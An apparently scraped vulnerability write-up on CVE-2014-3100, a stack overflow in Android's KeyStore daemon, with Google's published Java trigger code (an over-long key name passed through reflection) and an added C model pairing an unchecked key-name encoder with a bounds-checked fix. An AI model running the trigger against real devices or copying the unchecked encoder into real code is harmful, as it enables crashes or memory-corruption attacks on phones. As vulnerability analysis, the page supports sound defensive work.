[CVE-2014-3100] Android KeyStore stack overflow vulnerability analysis - vulnerability warning - the black bar safety net

2014-11-13T00:00:00
ID MYHACK58:62201455779
Type myhack58
Reporter Anonymous
Modified 2014-11-13T00:00:00

Description

CVE-2014-3100 is a stack overflow vulnerability in the KeyStore of the Android platform. It was found last September by two IBM engineers, reported to Google, and disclosed on June 23 this year. After the disclosure Google also released test code for the vulnerability. So what is the KeyStore?

Android provides the secure storage service implemented by /system/bin/keystore. Other software reaches this service through a unix socket. Versions 4.3 and later access it through the Binder interface; versions before 4.3 accept user requests over a local socket.

Each Android user has their own secure storage holding blobs. Blobs are encrypted for storage with the AES algorithm under a master key, and the master key is in turn encrypted with a key generated from the password by PKCS5_PBKDF2_HMAC_SHA1 and stored on disk.

In recent Android versions, secrets such as RSA private keys can already be hardware-backed. In that case the stored key is only an identifier for the real key kept in hardware. Apart from the hardware-backed ones, secrets such as VPN PPTP passwords are still encrypted and stored on disk.

Let's analyze the problem.

The get method of the android.security.KeyStore class accepts a parameter named keyName of type String, and a client can pass in a very long string.

    import java.lang.reflect.Method;

    // Google's published test code as reproduced on this page, with the
    // extraction line numbers stripped and wrapped in a method so it compiles.
    // KeyStore is reached via reflection because the class is not public API.
    static void triggerKeystoreGet() throws Exception {
        Class<?> keystoreClass = Class.forName("android.security.KeyStore");
        Method getInstance = keystoreClass.getMethod("getInstance");
        Method get = keystoreClass.getMethod("get", String.class);
        Object keystore = getInstance.invoke(null);
        // An over-long key name: the daemon copies it into a fixed-size stack buffer.
        String keyName = "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS"
                + "SSSS SSSS SSSS SSSS";
        get.invoke(keystore, keyName);
    }
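The bug class that the test code above exercises, modelled as an added C example (not the page's or AOSP's code): a daemon copies a caller-supplied key name into a fixed-size stack buffer, first without and then with a bound check. The buffer size NAME_BUF and the escaping rule used here are assumptions, not the real keystore encoding.

```c
/* Added example, not the page's or AOSP's code. NAME_BUF and the escaping
 * rule (bytes outside [A-Za-z0-9._-] become '+' plus two hex digits) are
 * assumptions that stand in for the real keystore daemon's encoder. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define NAME_BUF 255   /* assumed fixed on-stack buffer size */

static int plain_byte(unsigned char c) {
    return isalnum(c) || c == '.' || c == '_' || c == '-';
}

/* Vulnerable pattern: nothing ties the output to the size of out[], so a
 * long key name from the client writes past the end of the stack buffer. */
void encode_key_unchecked(char *out, const char *name) {
    for (; *name; name++) {
        if (plain_byte((unsigned char)*name)) *out++ = *name;
        else out += sprintf(out, "+%02x", (unsigned char)*name);
    }
    *out = '\0';
}

/* Hardened form: the encoder knows outlen and rejects input that would not
 * fit (including the terminator) instead of writing past the buffer.
 * Returns the encoded length, or -1 if the name was rejected. */
int encode_key_checked(char *out, size_t outlen, const char *name) {
    size_t used = 0;
    for (; *name; name++) {
        size_t need = plain_byte((unsigned char)*name) ? 1 : 3;
        if (used + need + 1 > outlen) return -1;
        if (need == 1) out[used] = *name;
        else snprintf(out + used, outlen - used, "+%02x", (unsigned char)*name);
        used += need;
    }
    out[used] = '\0';
    return (int)used;
}

/* Models the daemon's get(keyName) entry: the name lands in a stack buffer. */
int keystore_get(const char *key_name) {
    char filename[NAME_BUF];
    return encode_key_checked(filename, sizeof filename, key_name);
}

int main(void) {
    char big[1024];
    memset(big, 'S', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("short name -> %d\n", keystore_get("vpn_pptp_password")); /* 17 */
    printf("long name  -> %d\n", keystore_get(big));                  /* -1 */
    return 0;
}
```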
